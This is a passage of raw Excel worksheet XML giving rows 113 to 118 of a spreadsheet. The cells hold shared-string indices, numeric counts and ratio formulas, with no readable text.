        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR113" s="91"/>
      <c r="DS113" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT113" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU113" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV113" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW113" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX113" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY113" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ113" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA113" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB113" s="74"/>
      <c r="EC113" s="74">
        <v>0.0</v>
      </c>
      <c r="ED113" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE113" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="114" ht="153.75" customHeight="1">
      <c r="B114" s="71" t="s">
        <v>505</v>
      </c>
      <c r="C114" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D114" s="72" t="s">
        <v>1165</v>
      </c>
      <c r="E114" s="72" t="s">
        <v>1166</v>
      </c>
      <c r="F114" s="72" t="s">
        <v>1167</v>
      </c>
      <c r="G114" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H114" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I114" s="73" t="s">
        <v>1168</v>
      </c>
      <c r="J114" s="73" t="s">
        <v>1169</v>
      </c>
      <c r="K114" s="73" t="s">
        <v>1170</v>
      </c>
      <c r="L114" s="74">
        <v>160.0</v>
      </c>
      <c r="M114" s="74">
        <v>158.0</v>
      </c>
      <c r="N114" s="74">
        <v>6293.0</v>
      </c>
      <c r="O114" s="74">
        <f t="shared" si="1"/>
        <v>6293</v>
      </c>
      <c r="P114" s="74">
        <v>6293.0</v>
      </c>
      <c r="Q114" s="74">
        <v>0.0</v>
      </c>
      <c r="R114" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S114" s="76" t="s">
        <v>1171</v>
      </c>
      <c r="T114" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U114" s="77" t="s">
        <v>1172</v>
      </c>
      <c r="V114" s="76" t="s">
        <v>1173</v>
      </c>
      <c r="W114" s="76" t="s">
        <v>1174</v>
      </c>
      <c r="X114" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y114" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z114" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA114" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB114" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC114" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD114" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE114" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF114" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG114" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH114" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI114" s="78"/>
      <c r="AJ114" s="78"/>
      <c r="AK114" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL114" s="78"/>
      <c r="AM114" s="78"/>
      <c r="AN114" s="78"/>
      <c r="AO114" s="78"/>
      <c r="AP114" s="80"/>
      <c r="AQ114" s="80"/>
      <c r="AR114" s="80"/>
      <c r="AS114" s="80">
        <v>0.0</v>
      </c>
      <c r="AT114" s="80"/>
      <c r="AU114" s="80"/>
      <c r="AV114" s="80"/>
      <c r="AW114" s="80"/>
      <c r="AX114" s="80"/>
      <c r="AY114" s="80"/>
      <c r="AZ114" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA114" s="82" t="s">
        <v>1175</v>
      </c>
      <c r="BB114" s="82">
        <v>111.0</v>
      </c>
      <c r="BC114" s="82">
        <v>838.0</v>
      </c>
      <c r="BD114" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE114" s="82" t="s">
        <v>1176</v>
      </c>
      <c r="BF114" s="82"/>
      <c r="BG114" s="82"/>
      <c r="BH114" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI114" s="82"/>
      <c r="BJ114" s="82"/>
      <c r="BK114" s="82"/>
      <c r="BL114" s="82"/>
      <c r="BM114" s="83"/>
      <c r="BN114" s="83"/>
      <c r="BO114" s="83"/>
      <c r="BP114" s="83">
        <v>48.0</v>
      </c>
      <c r="BQ114" s="83"/>
      <c r="BR114" s="83"/>
      <c r="BS114" s="83"/>
      <c r="BT114" s="83"/>
      <c r="BU114" s="83"/>
      <c r="BV114" s="83"/>
      <c r="BW114" s="84">
        <f t="shared" si="5"/>
        <v>0.007627522644</v>
      </c>
      <c r="BX114" s="85" t="s">
        <v>1177</v>
      </c>
      <c r="BY114" s="85">
        <v>114.0</v>
      </c>
      <c r="BZ114" s="85">
        <v>7133.0</v>
      </c>
      <c r="CA114" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB114" s="85" t="s">
        <v>1178</v>
      </c>
      <c r="CC114" s="85"/>
      <c r="CD114" s="85"/>
      <c r="CE114" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF114" s="85"/>
      <c r="CG114" s="85"/>
      <c r="CH114" s="85"/>
      <c r="CI114" s="85"/>
      <c r="CJ114" s="86"/>
      <c r="CK114" s="86"/>
      <c r="CL114" s="86"/>
      <c r="CM114" s="86">
        <v>48.0</v>
      </c>
      <c r="CN114" s="86"/>
      <c r="CO114" s="86"/>
      <c r="CP114" s="86"/>
      <c r="CQ114" s="86"/>
      <c r="CR114" s="86"/>
      <c r="CS114" s="86"/>
      <c r="CT114" s="87">
        <f t="shared" si="7"/>
        <v>0.007627522644</v>
      </c>
      <c r="CU114" s="88" t="s">
        <v>1179</v>
      </c>
      <c r="CV114" s="88">
        <v>325.0</v>
      </c>
      <c r="CW114" s="88">
        <v>10440.0</v>
      </c>
      <c r="CX114" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY114" s="88" t="s">
        <v>1180</v>
      </c>
      <c r="CZ114" s="88"/>
      <c r="DA114" s="88"/>
      <c r="DB114" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC114" s="88"/>
      <c r="DD114" s="88"/>
      <c r="DE114" s="88"/>
      <c r="DF114" s="88"/>
      <c r="DG114" s="89"/>
      <c r="DH114" s="89"/>
      <c r="DI114" s="89"/>
      <c r="DJ114" s="89">
        <v>73.0</v>
      </c>
      <c r="DK114" s="89"/>
      <c r="DL114" s="89"/>
      <c r="DM114" s="89"/>
      <c r="DN114" s="89"/>
      <c r="DO114" s="89"/>
      <c r="DP114" s="89"/>
      <c r="DQ114" s="90">
        <f t="shared" si="9"/>
        <v>0.01160019069</v>
      </c>
      <c r="DR114" s="91" t="s">
        <v>1181</v>
      </c>
      <c r="DS114" s="92" t="s">
        <v>1182</v>
      </c>
      <c r="DT114" s="93">
        <v>58.0</v>
      </c>
      <c r="DU114" s="93">
        <v>432.0</v>
      </c>
      <c r="DV114" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW114" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX114" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY114" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ114" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA114" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB114" s="74"/>
      <c r="EC114" s="74">
        <v>208.0</v>
      </c>
      <c r="ED114" s="95">
        <f t="shared" si="10"/>
        <v>0.03305259812</v>
      </c>
      <c r="EE114" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="115" ht="153.75" customHeight="1">
      <c r="B115" s="71" t="s">
        <v>505</v>
      </c>
      <c r="C115" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D115" s="72" t="s">
        <v>1165</v>
      </c>
      <c r="E115" s="72" t="s">
        <v>1166</v>
      </c>
      <c r="F115" s="72" t="s">
        <v>1167</v>
      </c>
      <c r="G115" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H115" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I115" s="73" t="s">
        <v>1168</v>
      </c>
      <c r="J115" s="73" t="s">
        <v>104</v>
      </c>
      <c r="K115" s="73" t="s">
        <v>1183</v>
      </c>
      <c r="L115" s="74">
        <v>65682.0</v>
      </c>
      <c r="M115" s="74">
        <v>65680.0</v>
      </c>
      <c r="N115" s="74">
        <v>65737.0</v>
      </c>
      <c r="O115" s="74">
        <f t="shared" si="1"/>
        <v>65737</v>
      </c>
      <c r="P115" s="74">
        <v>65737.0</v>
      </c>
      <c r="Q115" s="74">
        <v>0.0</v>
      </c>
      <c r="R115" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S115" s="76" t="s">
        <v>1171</v>
      </c>
      <c r="T115" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U115" s="77" t="s">
        <v>1172</v>
      </c>
      <c r="V115" s="76" t="s">
        <v>1173</v>
      </c>
      <c r="W115" s="76" t="s">
        <v>1174</v>
      </c>
      <c r="X115" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y115" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z115" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA115" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB115" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC115" s="113" t="s">
        <v>112</v>
      </c>
      <c r="AD115" s="78" t="s">
        <v>1184</v>
      </c>
      <c r="AE115" s="78">
        <v>9.0</v>
      </c>
      <c r="AF115" s="78">
        <v>9.0</v>
      </c>
      <c r="AG115" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH115" s="78" t="s">
        <v>1185</v>
      </c>
      <c r="AI115" s="78"/>
      <c r="AJ115" s="78"/>
      <c r="AK115" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL115" s="78"/>
      <c r="AM115" s="78"/>
      <c r="AN115" s="78"/>
      <c r="AO115" s="78"/>
      <c r="AP115" s="80"/>
      <c r="AQ115" s="80"/>
      <c r="AR115" s="80"/>
      <c r="AS115" s="80">
        <v>3.0</v>
      </c>
      <c r="AT115" s="80"/>
      <c r="AU115" s="80"/>
      <c r="AV115" s="80"/>
      <c r="AW115" s="80"/>
      <c r="AX115" s="80"/>
      <c r="AY115" s="80"/>
      <c r="AZ115" s="81">
        <f t="shared" si="3"/>
        <v>0.00004563639959</v>
      </c>
      <c r="BA115" s="82" t="s">
        <v>1186</v>
      </c>
      <c r="BB115" s="82">
        <v>20.0</v>
      </c>
      <c r="BC115" s="82">
        <v>26.0</v>
      </c>
      <c r="BD115" s="79" t="s">
        <v>1187</v>
      </c>
      <c r="BE115" s="82" t="s">
        <v>1188</v>
      </c>
      <c r="BF115" s="82"/>
      <c r="BG115" s="82"/>
      <c r="BH115" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI115" s="82"/>
      <c r="BJ115" s="82"/>
      <c r="BK115" s="82"/>
      <c r="BL115" s="82"/>
      <c r="BM115" s="83"/>
      <c r="BN115" s="83"/>
      <c r="BO115" s="83"/>
      <c r="BP115" s="83">
        <v>49.0</v>
      </c>
      <c r="BQ115" s="83"/>
      <c r="BR115" s="83"/>
      <c r="BS115" s="83"/>
      <c r="BT115" s="83"/>
      <c r="BU115" s="83"/>
      <c r="BV115" s="83"/>
      <c r="BW115" s="84">
        <f t="shared" si="5"/>
        <v>0.0007453945267</v>
      </c>
      <c r="BX115" s="85" t="s">
        <v>1189</v>
      </c>
      <c r="BY115" s="85">
        <v>23.0</v>
      </c>
      <c r="BZ115" s="85">
        <v>44.0</v>
      </c>
      <c r="CA115" s="79" t="s">
        <v>121</v>
      </c>
      <c r="CB115" s="85" t="s">
        <v>1190</v>
      </c>
      <c r="CC115" s="85"/>
      <c r="CD115" s="85"/>
      <c r="CE115" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF115" s="85"/>
      <c r="CG115" s="85"/>
      <c r="CH115" s="85"/>
      <c r="CI115" s="85"/>
      <c r="CJ115" s="86"/>
      <c r="CK115" s="86"/>
      <c r="CL115" s="86"/>
      <c r="CM115" s="86">
        <v>49.0</v>
      </c>
      <c r="CN115" s="86"/>
      <c r="CO115" s="86"/>
      <c r="CP115" s="86"/>
      <c r="CQ115" s="86"/>
      <c r="CR115" s="86"/>
      <c r="CS115" s="86"/>
      <c r="CT115" s="87">
        <f t="shared" si="7"/>
        <v>0.0007453945267</v>
      </c>
      <c r="CU115" s="88" t="s">
        <v>1191</v>
      </c>
      <c r="CV115" s="88">
        <v>36.0</v>
      </c>
      <c r="CW115" s="88">
        <v>58.0</v>
      </c>
      <c r="CX115" s="79" t="s">
        <v>1192</v>
      </c>
      <c r="CY115" s="88" t="s">
        <v>1193</v>
      </c>
      <c r="CZ115" s="88"/>
      <c r="DA115" s="88"/>
      <c r="DB115" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC115" s="88"/>
      <c r="DD115" s="88"/>
      <c r="DE115" s="88"/>
      <c r="DF115" s="88"/>
      <c r="DG115" s="89"/>
      <c r="DH115" s="89"/>
      <c r="DI115" s="89"/>
      <c r="DJ115" s="89">
        <v>51.0</v>
      </c>
      <c r="DK115" s="89"/>
      <c r="DL115" s="89"/>
      <c r="DM115" s="89"/>
      <c r="DN115" s="89"/>
      <c r="DO115" s="89"/>
      <c r="DP115" s="89"/>
      <c r="DQ115" s="90">
        <f t="shared" si="9"/>
        <v>0.0007758187931</v>
      </c>
      <c r="DR115" s="91" t="s">
        <v>1194</v>
      </c>
      <c r="DS115" s="92">
        <v>45360.0</v>
      </c>
      <c r="DT115" s="93">
        <v>1.0</v>
      </c>
      <c r="DU115" s="93">
        <v>4.0</v>
      </c>
      <c r="DV115" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW115" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX115" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY115" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ115" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA115" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB115" s="74"/>
      <c r="EC115" s="74">
        <v>4.0</v>
      </c>
      <c r="ED115" s="95">
        <f t="shared" si="10"/>
        <v>0.00006084853279</v>
      </c>
      <c r="EE115" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="116" ht="153.75" customHeight="1">
      <c r="B116" s="71" t="s">
        <v>505</v>
      </c>
      <c r="C116" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D116" s="72" t="s">
        <v>1165</v>
      </c>
      <c r="E116" s="72" t="s">
        <v>1166</v>
      </c>
      <c r="F116" s="72" t="s">
        <v>1167</v>
      </c>
      <c r="G116" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H116" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I116" s="73" t="s">
        <v>1195</v>
      </c>
      <c r="J116" s="73" t="s">
        <v>771</v>
      </c>
      <c r="K116" s="73" t="s">
        <v>1196</v>
      </c>
      <c r="L116" s="74">
        <v>1.0</v>
      </c>
      <c r="M116" s="74">
        <v>1.0</v>
      </c>
      <c r="N116" s="74">
        <v>1.0</v>
      </c>
      <c r="O116" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P116" s="74">
        <v>1.0</v>
      </c>
      <c r="Q116" s="74">
        <v>0.0</v>
      </c>
      <c r="R116" s="75" t="s">
        <v>315</v>
      </c>
      <c r="S116" s="76" t="s">
        <v>1197</v>
      </c>
      <c r="T116" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U116" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V116" s="76" t="s">
        <v>1198</v>
      </c>
      <c r="W116" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X116" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y116" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z116" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA116" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB116" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC116" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD116" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE116" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF116" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG116" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH116" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI116" s="78"/>
      <c r="AJ116" s="78"/>
      <c r="AK116" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL116" s="78"/>
      <c r="AM116" s="78"/>
      <c r="AN116" s="78"/>
      <c r="AO116" s="78"/>
      <c r="AP116" s="80"/>
      <c r="AQ116" s="80"/>
      <c r="AR116" s="80"/>
      <c r="AS116" s="80">
        <v>0.0</v>
      </c>
      <c r="AT116" s="80"/>
      <c r="AU116" s="80"/>
      <c r="AV116" s="80"/>
      <c r="AW116" s="80"/>
      <c r="AX116" s="80"/>
      <c r="AY116" s="80"/>
      <c r="AZ116" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA116" s="82" t="s">
        <v>1199</v>
      </c>
      <c r="BB116" s="82">
        <v>2.0</v>
      </c>
      <c r="BC116" s="82">
        <v>2.0</v>
      </c>
      <c r="BD116" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE116" s="82" t="s">
        <v>1199</v>
      </c>
      <c r="BF116" s="82"/>
      <c r="BG116" s="82"/>
      <c r="BH116" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI116" s="82"/>
      <c r="BJ116" s="82"/>
      <c r="BK116" s="82"/>
      <c r="BL116" s="82"/>
      <c r="BM116" s="83"/>
      <c r="BN116" s="83"/>
      <c r="BO116" s="83"/>
      <c r="BP116" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ116" s="83"/>
      <c r="BR116" s="83"/>
      <c r="BS116" s="83"/>
      <c r="BT116" s="83"/>
      <c r="BU116" s="83"/>
      <c r="BV116" s="83"/>
      <c r="BW116" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX116" s="85" t="s">
        <v>1199</v>
      </c>
      <c r="BY116" s="85">
        <v>2.0</v>
      </c>
      <c r="BZ116" s="85">
        <v>2.0</v>
      </c>
      <c r="CA116" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB116" s="85" t="s">
        <v>1199</v>
      </c>
      <c r="CC116" s="85"/>
      <c r="CD116" s="85"/>
      <c r="CE116" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF116" s="85"/>
      <c r="CG116" s="85"/>
      <c r="CH116" s="85"/>
      <c r="CI116" s="85"/>
      <c r="CJ116" s="86"/>
      <c r="CK116" s="86"/>
      <c r="CL116" s="86"/>
      <c r="CM116" s="86">
        <v>0.0</v>
      </c>
      <c r="CN116" s="86"/>
      <c r="CO116" s="86"/>
      <c r="CP116" s="86"/>
      <c r="CQ116" s="86"/>
      <c r="CR116" s="86"/>
      <c r="CS116" s="86"/>
      <c r="CT116" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU116" s="88" t="s">
        <v>1200</v>
      </c>
      <c r="CV116" s="88">
        <v>5.0</v>
      </c>
      <c r="CW116" s="88">
        <v>43.0</v>
      </c>
      <c r="CX116" s="79" t="s">
        <v>466</v>
      </c>
      <c r="CY116" s="88" t="s">
        <v>1201</v>
      </c>
      <c r="CZ116" s="88"/>
      <c r="DA116" s="88"/>
      <c r="DB116" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC116" s="88"/>
      <c r="DD116" s="88"/>
      <c r="DE116" s="88"/>
      <c r="DF116" s="88"/>
      <c r="DG116" s="89"/>
      <c r="DH116" s="89"/>
      <c r="DI116" s="89"/>
      <c r="DJ116" s="89">
        <v>1.0</v>
      </c>
      <c r="DK116" s="89"/>
      <c r="DL116" s="89"/>
      <c r="DM116" s="89"/>
      <c r="DN116" s="89"/>
      <c r="DO116" s="89"/>
      <c r="DP116" s="89"/>
      <c r="DQ116" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR116" s="91"/>
      <c r="DS116" s="92">
        <v>12449.0</v>
      </c>
      <c r="DT116" s="93">
        <v>1.0</v>
      </c>
      <c r="DU116" s="93">
        <v>3.0</v>
      </c>
      <c r="DV116" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW116" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX116" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY116" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ116" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA116" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB116" s="74"/>
      <c r="EC116" s="74">
        <v>1.0</v>
      </c>
      <c r="ED116" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE116" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="117" ht="153.75" customHeight="1">
      <c r="B117" s="71" t="s">
        <v>505</v>
      </c>
      <c r="C117" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D117" s="72" t="s">
        <v>1165</v>
      </c>
      <c r="E117" s="72" t="s">
        <v>1202</v>
      </c>
      <c r="F117" s="72" t="s">
        <v>1203</v>
      </c>
      <c r="G117" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H117" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I117" s="73" t="s">
        <v>1204</v>
      </c>
      <c r="J117" s="73" t="s">
        <v>104</v>
      </c>
      <c r="K117" s="73" t="s">
        <v>1205</v>
      </c>
      <c r="L117" s="74">
        <v>1001.0</v>
      </c>
      <c r="M117" s="74">
        <v>1001.0</v>
      </c>
      <c r="N117" s="74">
        <v>1002.0</v>
      </c>
      <c r="O117" s="74">
        <f t="shared" si="1"/>
        <v>1002</v>
      </c>
      <c r="P117" s="74">
        <v>1002.0</v>
      </c>
      <c r="Q117" s="74">
        <v>0.0</v>
      </c>
      <c r="R117" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S117" s="76" t="s">
        <v>1206</v>
      </c>
      <c r="T117" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U117" s="77" t="s">
        <v>1207</v>
      </c>
      <c r="V117" s="76" t="s">
        <v>1208</v>
      </c>
      <c r="W117" s="76" t="s">
        <v>1209</v>
      </c>
      <c r="X117" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y117" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z117" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA117" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB117" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC117" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD117" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE117" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF117" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG117" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH117" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI117" s="78"/>
      <c r="AJ117" s="78"/>
      <c r="AK117" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL117" s="78"/>
      <c r="AM117" s="78"/>
      <c r="AN117" s="78"/>
      <c r="AO117" s="78"/>
      <c r="AP117" s="80"/>
      <c r="AQ117" s="80"/>
      <c r="AR117" s="80"/>
      <c r="AS117" s="80">
        <v>0.0</v>
      </c>
      <c r="AT117" s="80"/>
      <c r="AU117" s="80"/>
      <c r="AV117" s="80"/>
      <c r="AW117" s="80"/>
      <c r="AX117" s="80"/>
      <c r="AY117" s="80"/>
      <c r="AZ117" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA117" s="102" t="s">
        <v>1210</v>
      </c>
      <c r="BB117" s="82">
        <v>6.0</v>
      </c>
      <c r="BC117" s="82">
        <v>6.0</v>
      </c>
      <c r="BD117" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE117" s="102" t="s">
        <v>1210</v>
      </c>
      <c r="BF117" s="102"/>
      <c r="BG117" s="102"/>
      <c r="BH117" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI117" s="102"/>
      <c r="BJ117" s="102"/>
      <c r="BK117" s="102"/>
      <c r="BL117" s="102"/>
      <c r="BM117" s="103"/>
      <c r="BN117" s="103"/>
      <c r="BO117" s="103"/>
      <c r="BP117" s="83">
        <v>44.0</v>
      </c>
      <c r="BQ117" s="83"/>
      <c r="BR117" s="83"/>
      <c r="BS117" s="83"/>
      <c r="BT117" s="83"/>
      <c r="BU117" s="83"/>
      <c r="BV117" s="83"/>
      <c r="BW117" s="84">
        <f t="shared" si="5"/>
        <v>0.04391217565</v>
      </c>
      <c r="BX117" s="105" t="s">
        <v>1211</v>
      </c>
      <c r="BY117" s="85">
        <v>6.0</v>
      </c>
      <c r="BZ117" s="85">
        <v>6.0</v>
      </c>
      <c r="CA117" s="79" t="s">
        <v>1187</v>
      </c>
      <c r="CB117" s="105" t="s">
        <v>1212</v>
      </c>
      <c r="CC117" s="105"/>
      <c r="CD117" s="105"/>
      <c r="CE117" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF117" s="105"/>
      <c r="CG117" s="105"/>
      <c r="CH117" s="105"/>
      <c r="CI117" s="105"/>
      <c r="CJ117" s="106"/>
      <c r="CK117" s="106"/>
      <c r="CL117" s="106"/>
      <c r="CM117" s="86">
        <v>44.0</v>
      </c>
      <c r="CN117" s="86"/>
      <c r="CO117" s="86"/>
      <c r="CP117" s="86"/>
      <c r="CQ117" s="86"/>
      <c r="CR117" s="86"/>
      <c r="CS117" s="86"/>
      <c r="CT117" s="87">
        <f t="shared" si="7"/>
        <v>0.04391217565</v>
      </c>
      <c r="CU117" s="88" t="s">
        <v>1213</v>
      </c>
      <c r="CV117" s="88">
        <v>10.0</v>
      </c>
      <c r="CW117" s="88">
        <v>12.0</v>
      </c>
      <c r="CX117" s="79" t="s">
        <v>1214</v>
      </c>
      <c r="CY117" s="88" t="s">
        <v>1215</v>
      </c>
      <c r="CZ117" s="88"/>
      <c r="DA117" s="88"/>
      <c r="DB117" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC117" s="88"/>
      <c r="DD117" s="88"/>
      <c r="DE117" s="88"/>
      <c r="DF117" s="88"/>
      <c r="DG117" s="89"/>
      <c r="DH117" s="89"/>
      <c r="DI117" s="89"/>
      <c r="DJ117" s="89">
        <v>44.0</v>
      </c>
      <c r="DK117" s="89"/>
      <c r="DL117" s="89"/>
      <c r="DM117" s="89"/>
      <c r="DN117" s="89"/>
      <c r="DO117" s="89"/>
      <c r="DP117" s="89"/>
      <c r="DQ117" s="90">
        <f t="shared" si="9"/>
        <v>0.04391217565</v>
      </c>
      <c r="DR117" s="91" t="s">
        <v>1216</v>
      </c>
      <c r="DS117" s="92">
        <v>43814.0</v>
      </c>
      <c r="DT117" s="93">
        <v>1.0</v>
      </c>
      <c r="DU117" s="93">
        <v>6.0</v>
      </c>
      <c r="DV117" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW117" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX117" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY117" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ117" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA117" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB117" s="74"/>
      <c r="EC117" s="74">
        <v>6.0</v>
      </c>
      <c r="ED117" s="95">
        <f t="shared" si="10"/>
        <v>0.005988023952</v>
      </c>
      <c r="EE117" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="118" ht="153.75" customHeight="1">
      <c r="B118" s="71" t="s">
        <v>505</v>
      </c>
      <c r="C118" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D118" s="72" t="s">
        <v>1165</v>
      </c>
      <c r="E118" s="72" t="s">
        <v>1217</v>
      </c>
      <c r="F118" s="72" t="s">
        <v>1218</v>
      </c>
      <c r="G118" s="97" t="s">
        <v>12</v>
      </c>
      <c r="H118" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I118" s="73" t="s">
        <v>1219</v>
      </c>
      <c r="J118" s="73" t="s">
        <v>650</v>
      </c>
      <c r="K118" s="73" t="s">
        <v>1220</v>
      </c>
      <c r="L118" s="74">
        <v>52.0</v>
      </c>
      <c r="M118" s="74">
        <v>41.0</v>
      </c>
      <c r="N118" s="74">
        <v>41.0</v>
      </c>
      <c r="O118" s="74">
        <f t="shared" si="1"/>
        <v>41</v>
      </c>
      <c r="P118" s="74">
        <v>41.0</v>
      </c>
      <c r="Q118" s="74">
        <v>0.0</v>
      </c>
      <c r="R118" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S118" s="76" t="s">
        <v>1221</v>
      </c>
      <c r="T118" s="76" t="s">
        <v>1222</v>
      </c>
      <c r="U118" s="77" t="s">
        <v>1223</v>
      </c>
      <c r="V118" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W118" s="109"/>
      <c r="X118" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y118" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z118" s="75" t="s">
